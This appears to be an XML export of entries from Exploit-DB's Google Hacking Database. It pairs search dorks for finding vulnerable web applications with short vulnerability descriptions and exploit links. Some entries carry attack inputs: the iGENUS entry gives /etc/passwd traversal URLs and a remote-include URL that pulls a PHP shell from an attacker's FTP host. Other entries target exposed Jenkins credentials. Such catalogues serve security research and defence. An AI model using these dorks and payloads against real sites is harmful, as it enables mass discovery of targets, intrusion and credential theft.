<textualDescription>phpBazar admin Information Disclosure Vulnerability: https://www.exploit-db.com/exploits/14439</textualDescription>
<query>intitle: phpBazar-AdminPanel</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=intitle:+phpBazar-AdminPanel</querystring>
<edb>https://www.exploit-db.com/exploits/14439</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1264</id>
<link>https://www.exploit-db.com/ghdb/1264</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;4images - Image Gallery Management System&quot; and intext:&quot;Powered by 4images 1.7.1&quot;</shortDescription>
<textualDescription>Find web app: 4Images = 1.7.1This web app is vulenrable to remote code execution exploit.The url of exploit is this: http://milw0rm.com/id.php?id=1533Good hackingBy HaVoC</textualDescription>
<query>intitle:&quot;4images - Image Gallery Management System&quot; and intext:&quot;Powered by 4images 1.7.1&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%224images+-+Image+Gallery+Management+System%22+and+intext%3A%22Powered+by+4images+1.7.1%22</querystring>
<edb></edb>
<date>2006-02-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>1944</id>
<link>https://www.exploit-db.com/ghdb/1944</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Answer Builder&quot; Ask a question</shortDescription>
<textualDescription>Expert Advisior (index.php id) Remote SQL Injection Vulnerbility - CVE: 2007-3882: https://www.exploit-db.com/exploits/4189</textualDescription>
<query>intitle:&quot;Answer Builder&quot; Ask a question</query>
<querystring>https://www.google.com/search?q=intitle:%22Answer+Builder%22++Ask+a+question</querystring>
<edb>https://www.exploit-db.com/exploits/4189</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2429</id>
<link>https://www.exploit-db.com/ghdb/2429</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;ASP inline corporate calendar&quot; inurl:.asp?id=</shortDescription>
<textualDescription>ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2009-2243: https://www.exploit-db.com/exploits/8756</textualDescription>
<query>intitle:&quot;ASP inline corporate calendar&quot; inurl:.asp?id=</query>
<querystring>https://www.google.com/search?q=intitle:%22ASP+inline+corporate+calendar%22+++inurl:.asp%3Fid%3D</querystring>
<edb>https://www.exploit-db.com/exploits/8756</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1299</id>
<link>https://www.exploit-db.com/ghdb/1299</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;b2evo installer&quot; intext:&quot;Installer fÃÆür Version&quot;</shortDescription>
<textualDescription>this page lets you to know some interesting info on target machine, database name, username... it lets you to see phpinfo() and, if you know database password, lets you to inject arbitrary code in blogs/conf/_config.php, regardless of magic_quotes_gpc settings and launch commands wrote a simple dictionary attack tool fot this: http://retrogod.altervista.org/b2evo_16alpha_bf.html</textualDescription>
<query>intitle:&quot;b2evo installer&quot; intext:&quot;Installer fÃÆür Version&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22b2evo+installer%22+intext:%22Installer+f%C3%BCr+Version%22+&amp;hl=it&amp;start=0&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>1063</id>
<link>https://www.exploit-db.com/ghdb/1063</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;blog torrent upload&quot;</shortDescription>
<textualDescription>Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions.</textualDescription>
<query>intitle:&quot;blog torrent upload&quot;</query>
<querystring>https://www.google.com/search?q=+intitle%3A%22blog+torrent+upload%22+&amp;sstart=0&amp;start=0</querystring>
<edb></edb>
<date>2005-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3068</id>
<link>https://www.exploit-db.com/ghdb/3068</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;CCMS v3.1 Demo PW&quot;</shortDescription>
<textualDescription>CCMS 3.1 Demo Remote SQL Injection - CVE: 2007-6658: https://www.exploit-db.com/exploits/4809</textualDescription>
<query>intitle:&quot;CCMS v3.1 Demo PW&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22CCMS+v3.1+Demo+PW%22</querystring>
<edb>https://www.exploit-db.com/exploits/4809</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2019</id>
<link>https://www.exploit-db.com/ghdb/2019</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Dacio's Image Gallery&quot;</shortDescription>
<textualDescription>Dacio's Image Gallery 1.6 (DT/Bypass/SU) Remote Vulnerabilities: https://www.exploit-db.com/exploits/8653</textualDescription>
<query>intitle:&quot;Dacio's Image Gallery&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Dacio's+Image+Gallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/8653</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4117</id>
<link>https://www.exploit-db.com/ghdb/4117</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Dashboard [Jenkins]&quot; Credentials</shortDescription>
<textualDescription>Find Jenkins websites which do not require authentication to possibly
retrieve credentials and obtain remote command execution.
Vulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
- Th3R3p0</textualDescription>
<query>intitle:&quot;Dashboard [Jenkins]&quot; Credentials</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Dashboard [Jenkins]&quot; Credentials</querystring>
<edb></edb>
<date>2015-11-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3339</id>
<link>https://www.exploit-db.com/ghdb/3339</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Directory Listing For /&quot; + inurl:webdav tomcat</shortDescription>
<textualDescription>Apache Tomcat (webdav) Remote File Disclosure: https://www.exploit-db.com/exploits/4552</textualDescription>
<query>intitle:&quot;Directory Listing For /&quot; + inurl:webdav tomcat</query>
<querystring>https://www.google.com/search?q=intitle:%22Directory+Listing+For+/%22+%2B+inurl:webdav+tomcat</querystring>
<edb>https://www.exploit-db.com/exploits/4552</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2477</id>
<link>https://www.exploit-db.com/ghdb/2477</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;DUcalendar 1.0&quot;</shortDescription>
<textualDescription>DUcalendar 1.0 (detail.asp iEve) Remote SQL Injection Vulnerability - CVE: 2008-2868: https://www.exploit-db.com/exploits/5927</textualDescription>
<query>intitle:&quot;DUcalendar 1.0&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22DUcalendar+1.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/5927</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5996</id>
<link>https://www.exploit-db.com/ghdb/5996</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;elFinder 2.1.x&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;elFinder 2.1.x&quot;
# elFinder </textualDescription>
<query>intitle:&quot;elFinder 2.1.x&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;elFinder 2.1.x&quot;</querystring>
<edb></edb>
<date>2020-05-04</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>560</id>
<link>https://www.exploit-db.com/ghdb/560</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;EMUMAIL - Login&quot; &quot;Powered by EMU Webmail&quot;</shortDescription>
<textualDescription>The failure to strip script tags in emumail.cgi allows for XSS type of attack. Vulnerable systems: * EMU Webmail version 5.0 * EMU Webmail version 5.1.0 Depending on what functions you throw in there, you get certain contents of the emumail.cgi file. The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. http://www.securityfocus.com/bid/9861</textualDescription>
<query>intitle:&quot;EMUMAIL - Login&quot; &quot;Powered by EMU Webmail&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22EMUMAIL+-+Login%22+%22Powered+by+EMU+Webmail%22+++</querystring>
<edb></edb>
<date>2004-10-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>1347</id>
<link>https://www.exploit-db.com/ghdb/1347</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;HelpDesk&quot; &quot;If you need additional help, please email helpdesk at&quot;</shortDescription>
<textualDescription>it's another helpdesk application.my exploit:http://fr0zen.no-ip.org/phphelpdesk-0.6.16_rcxcn_xpl.phps</textualDescription>
<query>intitle:&quot;HelpDesk&quot; &quot;If you need additional help, please email helpdesk at&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22HelpDesk%22+%22If+you+need+additional+help%2C+please+email+helpdesk+at%22&amp;btnG=H%C4%BEada%C5%A5</querystring>
<edb></edb>
<date>2006-04-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>6349</id>
<link>https://www.exploit-db.com/ghdb/6349</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;IceWarp WebClient&quot;</shortDescription>
<textualDescription># Dork :intitle:&quot;IceWarp WebClient&quot;
# IceWarp WebClient Login panel
# Author : Ambadi MP
</textualDescription>
<query>intitle:&quot;IceWarp WebClient&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;IceWarp WebClient&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ambadi MP</author>
</entry>
<entry>
<id>3150</id>
<link>https://www.exploit-db.com/ghdb/3150</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;igenus webmail login&quot;</shortDescription>
<textualDescription>iGENUS WebMail 2.0.2 (config_inc.php) Remote Code Execution - CVE: 2006-1031: https://www.exploit-db.com/exploits/1527</textualDescription>
<query>intitle:&quot;igenus webmail login&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22igenus+webmail+login%22</querystring>
<edb>https://www.exploit-db.com/exploits/1527</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1308</id>
<link>https://www.exploit-db.com/ghdb/1308</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;igenus webmail login&quot;</shortDescription>
<textualDescription>intitle:&quot;igenus webmail login&quot;example exploit: http://[target]/[path]/?Lang=../../../../../../../../../../etc/passwd%00 http://[target]/[path]/config/config_inc.php?SG_HOME=../../../../../../../../../../etc/passwd%00 also, on php5: http://[target]/[path]/config/config_inc.php?SG_HOME=ftp://username:password@somehost.com&amp;cmd=dir where on somehost.com you have a php shell code in a &quot;.config&quot; file exploit code: http://retrogod.altervista.org/igenus_202_xpl_pl.html</textualDescription>
<query>intitle:&quot;igenus webmail login&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22igenus+webmail+login%22&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-02-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>4541</id>
<link>https://www.exploit-db.com/ghdb/4541</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Index of /&quot; &quot;mod_ssl 2.2.22 OpenSSL/1.0.1&quot;</shortDescription>
<textualDescription>Finds OpenSSL servers that are vulnerable to the Heartbleed Bug
Dxtroyer</textualDescription>
<query>intitle:&quot;Index of /&quot; &quot;mod_ssl 2.2.22 OpenSSL/1.0.1&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of /&quot; &quot;mod_ssl 2.2.22 OpenSSL/1.0.1&quot;</querystring>
<edb></edb>
<date>2017-06-26</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>6128</id>
<link>https://www.exploit-db.com/ghdb/6128</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Index of&quot; intitle:&quot;UserPro&quot; -uploads</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; intitle:&quot;UserPro&quot; -uploads
# WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting. This dork is
linked to the following existing exploit:
https://www.exploit-db.com/exploits/47304
# Date: 26/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Index of&quot; intitle:&quot;UserPro&quot; -uploads</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; intitle:&quot;UserPro&quot; -uploads</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1892</id>
<link>https://www.exploit-db.com/ghdb/1892</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;ITech Bids&quot;</shortDescription>
<textualDescription>ITechBids 5.0 (bidhistory.php item_id) Remote SQL Injection Vulnerability - CVE: 2008-0692: https://www.exploit-db.com/exploits/5056</textualDescription>
<query>intitle:&quot;ITech Bids&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22ITech+Bids%22</querystring>
<edb>https://www.exploit-db.com/exploits/5056</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1598</id>
<link>https://www.exploit-db.com/ghdb/1598</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Jax Formmailer - Administration&quot;</shortDescription>
<textualDescription>Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: https://www.exploit-db.com/exploits/9051</textualDescription>
<query>intitle:&quot;Jax Formmailer - Administration&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Jax+Formmailer+-+Administration%22</querystring>
<edb>https://www.exploit-db.com/exploits/9051</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1631</id>
<link>https://www.exploit-db.com/ghdb/1631</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;jGallery&quot;</shortDescription>
<textualDescription>jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: https://www.exploit-db.com/exploits/3760</textualDescription>
<query>intitle:&quot;jGallery&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22jGallery%22</querystring>
<edb>https://www.exploit-db.com/exploits/3760</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5694</id>
<link>https://www.exploit-db.com/ghdb/5694</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;kentico database setup&quot;</shortDescription>
<textualDescription># Exploit Title: Google Dork for Kentico CVE-201717736
# Google Dork: intitle:&quot;kentico database setup&quot;
# Date: January 21, 2020
# Exploit Author: Nathan Potter
# Version: Kentico 8.X, </textualDescription>
<query>intitle:&quot;kentico database setup&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;kentico database setup&quot;</querystring>
<edb></edb>
<date>2020-01-21</date>
<author>Nathan Potter</author>
</entry>
<entry>
<id>3454</id>
<link>https://www.exploit-db.com/ghdb/3454</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;login to cacti&quot;</shortDescription>
<textualDescription>Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: https://www.exploit-db.com/exploits/3045</textualDescription>
<query>intitle:&quot;login to cacti&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22login+to+cacti%22</querystring>
<edb>https://www.exploit-db.com/exploits/3045</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3474</id>
<link>https://www.exploit-db.com/ghdb/3474</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;login to cacti&quot;</shortDescription>
<textualDescription>Cacti 0.8.6i cmd.php popen() Remote Injection: https://www.exploit-db.com/exploits/3029</textualDescription>
<query>intitle:&quot;login to cacti&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22login+to+cacti%22</querystring>
<edb>https://www.exploit-db.com/exploits/3029</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1549</id>
<link>https://www.exploit-db.com/ghdb/1549</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Login to Calendar&quot;</shortDescription>
<textualDescription>ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: https://www.exploit-db.com/exploits/1763</textualDescription>
<query>intitle:&quot;Login to Calendar&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22Login+to+Calendar%22</querystring>
<edb>https://www.exploit-db.com/exploits/1763</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1078</id>
<link>https://www.exploit-db.com/ghdb/1078</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Looking Glass v20040427&quot; &quot;When verifying an URL check one of those&quot;</shortDescription>
<textualDescription>Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&amp;page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html</textualDescription>
<query>intitle:&quot;Looking Glass v20040427&quot; &quot;When verifying</query>
<querystring>https://www.google.com/search?q=intitle:%22Looking+Glass+v20040427%22+%22When+verifying+an+URL+check+one+of+those%22+&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-09-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>2348</id>
<link>https://www.exploit-db.com/ghdb/2348</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;MAXSITE&quot;</shortDescription>
<textualDescription>CMS MAXSITE 1.10 (category) Remote SQL Injection Vulnerability - CVE: 2008-2487: https://www.exploit-db.com/exploits/5676</textualDescription>
<query>intitle:&quot;MAXSITE&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22MAXSITE%22</querystring>
<edb>https://www.exploit-db.com/exploits/5676</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>506</id>
<link>https://www.exploit-db.com/ghdb/506</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;MRTG/RRD&quot; 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)</shortDescription>
<textualDescription>The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option &quot;root:x:0:1:super-user:/&quot; on line 2 or above.</textualDescription>
<query>intitle:&quot;MRTG/RRD&quot; 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intitle%3A%22MRTG%2FRRD%22+1.1*+%28inurl%3Amrtg.cgi+%7C+inurl%3A14all.cgi+%7Ctraffic.cgi%29+</querystring>
<edb></edb>
<date>2004-09-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5913</id>
<link>https://www.exploit-db.com/ghdb/5913</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;My Book World Edition - MyBookWorld&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;My Book World Edition - MyBookWorld&quot;
# By using this dork, sites vulnerable to Western Digital My Book World II
NAS </textualDescription>
<query>intitle:&quot;My Book World Edition - MyBookWorld&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;My Book World Edition - MyBookWorld&quot;</querystring>
<edb></edb>
<date>2020-04-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>975</id>
<link>https://www.exploit-db.com/ghdb/975</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;myBloggie 2.1.1..2 - by myWebland&quot;</shortDescription>
<textualDescription>myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507</textualDescription>
<query>intitle:&quot;myBloggie 2.1.1..2 - by myWebland&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22myBloggie+2.1.1..2+-+by+myWebland%22</querystring>
<edb></edb>
<date>2005-05-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4647</id>
<link>https://www.exploit-db.com/ghdb/4647</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Nport web console&quot;</shortDescription>
<textualDescription>Vulnerable moxa devices can be identified with the following dork
intitle:&quot;Nport web console&quot;
reference:https://ics-cert.us-cert.gov/advisories/ICSA-17-355-01
</textualDescription>
<query>intitle:&quot;Nport web console&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Nport web console&quot;</querystring>
<edb></edb>
<date>2018-01-02</date>
<author>Mudassar</author>
</entry>
<entry>
<id>978</id>
<link>https://www.exploit-db.com/ghdb/978</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;osTicket :: Support Ticket System&quot;</shortDescription>
<textualDescription>osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&amp;type=security&amp;ID=3882</textualDescription>
<query>intitle:&quot;osTicket :: Support Ticket System&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22osTicket+%3A%3A+Support+Ticket+System%22+</querystring>
<edb></edb>
<date>2005-05-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>3370</id>
<link>https://www.exploit-db.com/ghdb/3370</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;owl intranet * owl&quot; 0.82</shortDescription>
<textualDescription>OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: https://www.exploit-db.com/exploits/1561</textualDescription>
<query>intitle:&quot;owl intranet * owl&quot; 0.82</query>
<querystring>https://www.google.com/search?q=intitle:%22owl+intranet+*+owl%22+0.82</querystring>
<edb>https://www.exploit-db.com/exploits/1561</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3933</id>
<link>https://www.exploit-db.com/ghdb/3933</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;pChart 2.x - examples&quot; intext:&quot;2.1.3&quot;</shortDescription>
<textualDescription>The web application is vulnerable to Directory Traversal and XSS.
The version number can be omitted, all prior versions prior than 2.1.4
are vulnerable.
Advisories and Vulnerabilities
https://www.exploit-db.com/exploits/31173/
http://www.pchart.net/advisory</textualDescription>
<query>intitle:&quot;pChart 2.x - examples&quot; intext:&quot;2.1.3&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;pChart 2.x - examples&quot; intext:&quot;2.1.3&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/31173</edb>
<date>2014-02-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1144</id>
<link>https://www.exploit-db.com/ghdb/1144</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;PHP TopSites FREE Remote Admin&quot;</shortDescription>
<textualDescription>PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.PHP TopSites Discloses Configuration Data to Remote Users:http://www.securitytracker.com/alerts/2005/Jul/1014552.htmlPS: all versions are vulnerable at time of writing.</textualDescription>
<query>intitle:&quot;PHP TopSites FREE Remote Admin&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=intitle%3A%22PHP+TopSites+FREE+Remote+Admin%22</querystring>
<edb></edb>
<date>2005-09-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>1244</id>
<link>https://www.exploit-db.com/ghdb/1244</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;phpDocumentor web interface&quot;</shortDescription>
<textualDescription>Php Documentor &lt; = 1.3.0 rc4 remote code xctn dork: intitle:&quot;phpDocumentor web interface&quot;advisory &amp; poc exploit:http://rgod.altervista.org/phpdocumentor_130rc4_incl_expl.html</textualDescription>
<query>intitle:&quot;phpDocumentor web interface&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22phpDocumentor+web+interface%22&amp;hl=it&amp;start=10&amp;sa=N&amp;filter=0</querystring>
<edb></edb>
<date>2006-01-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>6702</id>
<link>https://www.exploit-db.com/ghdb/6702</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Please Login&quot; &quot;Use FTM Push&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Please Login&quot; &quot;Use FTM Push&quot;
# Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification. CVE-2018-13382. https://www.exploit-db.com/exploits/49074
# Date: 22/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Please Login&quot; &quot;Use FTM Push&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Please Login&quot; &quot;Use FTM Push&quot;</querystring>
<edb></edb>
<date>2020-11-24</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1001</id>
<link>https://www.exploit-db.com/ghdb/1001</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;PowerDownload&quot; (&quot;PowerDownload v3.0.2 ©&quot; | &quot;PowerDownload v3.0.3 ©&quot; ) -site:powerscripts.org</shortDescription>
<textualDescription>The PowerDownload program (version 3.0.2 and 3.0.3) contains a serious vulnerability. Vulnerability discovery: SoulBlack - Security Research (http://soulblack.com.ar)Date: 05/31/2005Severity: High. Remote Users Can Execute Arbitrary Code.Affected version: v3.0.2 &amp; v3.0.3vendor: http://www.powerscripts.org/* Fix *Contact the Vendor* References *http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt</textualDescription>
<query>intitle:&quot;PowerDownload&quot; (&quot;PowerDownload v3.0.2 ©&quot; | &quot;PowerDownload v3.0.3 ©&quot; ) -site:powerscripts.org</query>
<querystring>https://www.google.com/search?q=intitle:%22PowerDownload%22+(%22PowerDownload+v3.0.2+©%22+%7C+%22PowerDownload+v3.0.3+©%22+)+-site:powerscripts.org</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>2911</id>
<link>https://www.exploit-db.com/ghdb/2911</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Powered by Open Bulletin Board&quot;</shortDescription>
<textualDescription>Open Bulletin Board Multiple Blind Sql Injection Vulnerability: https://www.exploit-db.com/exploits/11336</textualDescription>
<query>intitle:&quot;Powered by Open Bulletin Board&quot;</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Powered+by+Open+Bulletin+Board%22</querystring>
<edb>https://www.exploit-db.com/exploits/11336</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6659</id>
<link>https://www.exploit-db.com/ghdb/6659</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;Powered by Pro Chat Rooms&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Powered by Pro Chat Rooms&quot;
# Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities. CVE-2014-5275, CVE-2014-5276. https://www.exploit-db.com/exploits/34275
# Date: 29/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;Powered by Pro Chat Rooms&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Powered by Pro Chat Rooms&quot;</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3258</id>
<link>https://www.exploit-db.com/ghdb/3258</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;ppc engine admin login form&quot;</shortDescription>
<textualDescription>PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: https://www.exploit-db.com/exploits/3104</textualDescription>
<query>intitle:&quot;ppc engine admin login form&quot;</query>
<querystring>https://www.google.com/search?q=intitle:%22ppc+engine+admin+login+form%22</querystring>
<edb>https://www.exploit-db.com/exploits/3104</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5227</id>
<link>https://www.exploit-db.com/ghdb/5227</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:pdf</shortDescription>
<textualDescription>This dork allows identification and detection of
vulnerabilities arising from mis-configurations or flawed programming
within a network-based asset such as a firewall, router, web server,
application server, etc from already scanned reports.
*Google Dork :* intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; |
&quot;netsparker&quot; | &quot;nmap&quot;) filetype:pdf
*Exploit Author*:- Deepak Joshi
</textualDescription>
<query>intitle:&quot;report&quot; (&quot;qualys&quot; | &quot;acunetix&quot; | &quot;nessus&quot; | &quot;netsparker&quot; | &quot;nmap&quot;) filetype:pdf</query>
